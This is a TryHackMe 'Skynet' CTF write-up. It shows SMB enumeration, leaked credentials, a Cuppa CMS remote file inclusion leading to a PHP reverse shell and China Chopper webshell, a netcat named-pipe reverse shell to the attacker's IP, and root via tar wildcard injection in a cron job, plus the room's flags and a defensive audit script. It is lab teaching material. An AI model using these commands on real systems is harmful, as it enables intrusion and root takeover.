Security: TryHackMe Skynet, remote file inclusion and cron job wildcard privilege escalation


Service scan

┌──(root💀kali)-[~]
└─# nmap -sV 10.10.166.193
Starting Nmap 7.91 (https://nmap.org) at 2021-08-31 05:18 EDT
Nmap scan report for 10.10.111.23
Host is up (0.32s latency).
Not shown: 994 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
110/tcp open  pop3        Dovecot pop3d
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.67 seconds

Directory brute force

└─# python3 dirsearch.py -u http://10.10.166.193 -e * -t 50 -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_|)

Extensions: CHANGELOG.md | HTTP method: get | Threads: 50 | Wordlist size: 220521

Error Log: /root/dirsearch/logs/errors-21-08-31_05-34-51.log

Target: http://10.10.166.193

[05:34:52] Starting: 
[05:34:58] 301 -  312B  - /admin  ->  http://10.10.111.23/admin/
[05:34:59] 200 -  523B  - /                 
[05:35:00] 301 -  310B  - /css  ->  http://10.10.111.23/css/
[05:35:03] 301 -  309B  - /js  ->  http://10.10.111.23/js/
[05:35:06] 301 -  313B  - /config  ->  http://10.10.111.23/config/
[05:35:19] 301 -  309B  - /ai  ->  http://10.10.111.23/ai/
[05:37:06] 301 -  319B  - /squirrelmail  ->  http://10.10.111.23/squirrelmail/

Enumerating the Samba service

Enumerating users: the server accepts a null session login

┌──(root💀kali)-[~]
└─# enum4linux -U 10.10.166.193
Starting enum4linux v0.8.9 (http://labs.portcullis.co.uk/application/enum4linux/) on Wed Sep  1 02:38:03 2021

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.166.193
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ==================================================== 
|    Enumerating Workgroup/Domain on 10.10.166.193    |
 ==================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ===================================== 
|    Session Check on 10.10.166.193    |
 ===================================== 
[+] Server 10.10.166.193 allows sessions using username '', password''

 =========================================== 
|    Getting domain SID for 10.10.166.193    |
 =========================================== 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ============================= 
|    Users on 10.10.166.193    |
 ============================= 
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: milesdyson       Name:   Desc: 

user:[milesdyson] rid:[0x3e8]
enum4linux complete on Wed Sep  1 02:38:20 2021

Enumerating shares

┌──(root💀kali)-[~]
└─# enum4linux -S 10.10.166.193
Starting enum4linux v0.8.9 (http://labs.portcullis.co.uk/application/enum4linux/) on Wed Sep  1 02:41:21 2021

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.166.193
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ==================================================== 
|    Enumerating Workgroup/Domain on 10.10.166.193    |
 ==================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ===================================== 
|    Session Check on 10.10.166.193    |
 ===================================== 
[+] Server 10.10.166.193 allows sessions using username '', password''

 =========================================== 
|    Getting domain SID for 10.10.166.193    |
 =========================================== 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ========================================= 
|    Share Enumeration on 10.10.166.193    |
 ========================================= 

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        anonymous       Disk      Skynet Anonymous Share
        milesdyson      Disk      Miles Dyson Personal Share
        IPC$            IPC       IPC Service (skynet server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.166.193
//10.10.166.193/print$   Mapping: DENIED, Listing: N/A
//10.10.166.193/anonymous        Mapping: OK, Listing: OK
//10.10.166.193/milesdyson       Mapping: DENIED, Listing: N/A
//10.10.166.193/IPC$     [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
enum4linux complete on Wed Sep  1 02:41:44 2021

Connecting over SMB

smbclient //10.10.166.193/anonymous

A plaintext password is found in logs/log1.txt: cyborg007haloterminator

question:What is Miles password for his emails?

answer:cyborg007haloterminator

Log in at http://10.10.166.193/squirrel…

Credentials: milesdyson:cyborg007haloterminator

Email 1 leaks the Samba password in plaintext

We have changed your smb password after system malfunction.
Password: )s{A&2Z=F^n_E.B`

Email 2 is an odd binary string; convert it to text

01100010 01100001 01101100 01101100 01110011 00100000 01101000 01100001 01110110
01100101 00100000 01111010 01100101 01110010 01101111 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111

Converted to text:

balls hav zero tome to meto me tome to meto me tome to meto

Email 3 is a strange piece of text; a Google search suggests it is the output of the Facebook AI that went off the rails a few years ago

i can i i everything else . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to
you i everything else . . . . . . . . . . . . . .
balls have a ball to me to me to me to me to me to me to me
i i can i i i everything else . . . . . . . . . . . . . .
balls have a ball to me to me to me to me to me to me to me
i . . . . . . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to
you i i i i i everything else . . . . . . . . . . . . . .
balls have 0 to me to me to me to me to me to me to me to me to
you i i i everything else . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to

Logging in to milesdyson's Samba share

smbclient //10.10.166.193/milesdyson -U milesdyson
Password: )s{A&2Z=F^n_E.B`

The following is found in notes/important.txt

1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife

Hidden directory name

/45kra24zxs28v3yd

question:What is the hidden directory?
answer:/45kra24zxs28v3yd
question:What is the vulnerability called when you can include a remote file for malicious purposes?
answer:/remote file inclusion 

Brute-forcing the hidden directory

┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -u "http://10.10.166.193/45kra24zxs28v3yd/" -e* -t 50   

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_|)

Extensions: * | HTTP method: get | Threads: 50 | Wordlist size: 6100

Error Log: /root/dirsearch/logs/errors-21-09-01_04-50-59.log

Target: http://10.10.166.193/45kra24zxs28v3yd/

[04:50:59] Starting: 
[04:51:14] 301 -  337B  - /45kra24zxs28v3yd/administrator  ->  http://10.10.166.193/45kra24zxs28v3yd/administrator/
[04:51:14] 403 -  277B  - /45kra24zxs28v3yd/administrator/.htaccess
[04:51:15] 200 -    5KB - /45kra24zxs28v3yd/administrator/
[04:51:15] 200 -    5KB - /45kra24zxs28v3yd/administrator/index.php
[04:51:26] 200 -  418B  - /45kra24zxs28v3yd/index.html                                                            
                                                                                                                  
Task Completed

Login page found: http://10.10.166.193/45kra24z…

CMS name

Cuppa CMS

CMS exploit

Cuppa CMS has a Local/Remote File Inclusion vulnerability
https://www.exploit-db.com/ex…

Verifying the LFI:
http://10.10.166.193/45kra24z…

Local files on the target can be read:

Field configuration:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false lxd:x:106:65534::/var/lib/lxd/:/bin/false messagebus:x:107:111::/var/run/dbus:/bin/false uuidd:x:108:112::/run/uuidd:/bin/false dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin milesdyson:x:1001:1001:,,,:/home/milesdyson:/bin/bash dovecot:x:111:119:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false dovenull:x:112:120:Dovecot login user,,,:/nonexistent:/bin/false postfix:x:113:121::/var/spool/postfix:/bin/false mysql:x:114:123:MySQL Server,,,:/nonexistent:/bin/false 

Remote inclusion of a PHP file

Prepare the reverse shell file and start a local HTTP server
python3 -m http.server

http://10.10.166.193/45kra24z…

Initial shell obtained

user.txt is found in /home/milesdyson

question:What is the user flag?
answer:7ce5c2109a40f958099283600a9ae807

Upgrade to a stable shell: download a one-liner webshell from the command line

wget http://10.13.21.169:8000/shel…

Webshell URL; connect to it with the Caidao (China Chopper) client

http://10.10.166.193/45kra24z…

`su milesdyson` works (a tty is needed first) with the password cyborg007haloterminator, but direct SSH login with it does not.

Checking scheduled tasks

$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
*/1 *   * * *   root    /home/milesdyson/backups/backup.sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || (cd / && run-parts --report /etc/cron.daily)
47 6    * * 7   root    test -x /usr/sbin/anacron || (cd / && run-parts --report /etc/cron.weekly)
52 6    1 * *   root    test -x /usr/sbin/anacron || (cd / && run-parts --report /etc/cron.monthly)

Checking the cron script

$ cat /home/milesdyson/backups/backup.sh
cat /home/milesdyson/backups/backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *

Wildcard privilege escalation: write three files into /var/www/html/

Because nc on the target does not support -e, a different reverse shell method is used; run the following commands one by one

mknod /tmp/backpipe p

echo '/bin/sh 0</tmp/backpipe | nc 10.13.21.169 4455 1>/tmp/backpipe' > shell.sh

echo "" > "--checkpoint-action=exec=sh shell.sh"

echo "" > --checkpoint=1

How the wildcard privilege escalation works

When cron runs `tar cf /home/milesdyson/backups/backup.tgz *`, the shell expands `*` to the file names in /var/www/html before tar starts, so the command effectively becomes: `tar cf /home/milesdyson/backups/backup.tgz --checkpoint=1 --checkpoint-action=exec=sh shell.sh shell.sh`. GNU tar parses the two file names that start with `--` as options, and the checkpoint action runs shell.sh as root.
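An added audit helper (not from the writeup or the lab) that covers both the backup.sh cron script above and the expansion explanation: it counts the option-like names a root cron job would feed to tar through `*`, shows the expanded argument vector, and prints the hardened form of the backup line. The web root and file names are constructed for the demo.

```sh
#!/bin/sh
# Added audit example; not part of the writeup or the lab. The file names are
# constructed to mirror the three files the writeup plants in /var/www/html.

# Count entries in $1 whose names start with '-'. Those are exactly the names
# that `tar cf archive *`, run from inside $1, receives as options rather than
# as files, because the shell expands * before tar ever sees it.
count_option_like_names() {
    n=0
    for f in "$1"/*; do
        [ -e "$f" ] || continue          # empty dir: the literal '*' stays
        case "${f##*/}" in
            -*) n=$((n + 1)) ;;
        esac
    done
    echo "$n"
}

# Print the argument vector that * expands to inside $1, one word per line,
# so an auditor can see what the cron job would really pass to tar.
show_glob_expansion() {
    ( cd "$1" && for w in *; do printf '%s\n' "$w"; done )
}

# Safe form of the lab's backup line: '--' ends option parsing and '.' replaces
# '*', so no file name in the web root can ever be parsed as a tar flag.
hardened_backup_cmd() {
    echo 'cd /var/www/html && tar cf /home/milesdyson/backups/backup.tgz -- .'
}

# Demo: build a throwaway web root with the writeup's file names and report
# how many of them tar would treat as options (expected: 2).
demo() {
    d=$(mktemp -d) || return 1
    : > "$d/index.html"
    : > "$d/shell.sh"
    : > "$d/--checkpoint=1"
    : > "$d/--checkpoint-action=exec=sh shell.sh"
    count_option_like_names "$d"
    rm -rf "$d"
}
```

Running `count_option_like_names` against every directory that a root-owned cron script globs is a cheap periodic check; any non-zero result deserves a look.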

In another terminal, start a listener and wait a minute for cron to run; the reverse shell comes back as root

nc -lnvp 4455

root.txt is found in /root/

question:What is the root flag?
answer:3f0372db24753accc7179a282cd6a949
